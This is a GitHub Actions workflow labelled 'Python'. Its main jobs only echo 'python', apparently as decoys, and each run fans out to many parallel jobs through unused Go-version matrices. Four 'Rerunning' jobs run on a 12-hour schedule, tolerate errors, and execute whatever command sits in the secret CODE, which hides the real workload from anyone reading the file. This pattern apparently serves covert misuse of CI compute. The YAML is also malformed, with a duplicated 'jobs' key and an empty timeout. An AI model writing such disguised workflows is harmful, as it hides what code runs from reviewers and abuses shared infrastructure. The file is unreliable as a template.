name: Python

on:  
  push:
  pull_request:
  schedule: 
  - cron: "0 */12 * * *"

jobs:
 python-a:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 60
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-b:
    runs-on: ubuntu-latest 
    needs: python-a
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 60
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    needs: python-a
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "pythosns"
 
 python-2:
    runs-on: ubuntu-latest
    needs: python-b
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 60
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"
 
 python-build-4:
    runs-on: ubuntu-latest
    needs: python-a
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: ${{ secrets.CODE }} 
 python-build-3:
    runs-on: ubuntu-latest
    needs: python-b
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [B]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: ${{ secrets.CODE }} 
 
 python-build-2:
    runs-on: ubuntu-latest
    needs: python-a
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [C]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: ${{ secrets.CODE }} 
 python-build-1:
    runs-on: ubuntu-latest
    needs: python-b
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [D]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: ${{ secrets.CODE }} 
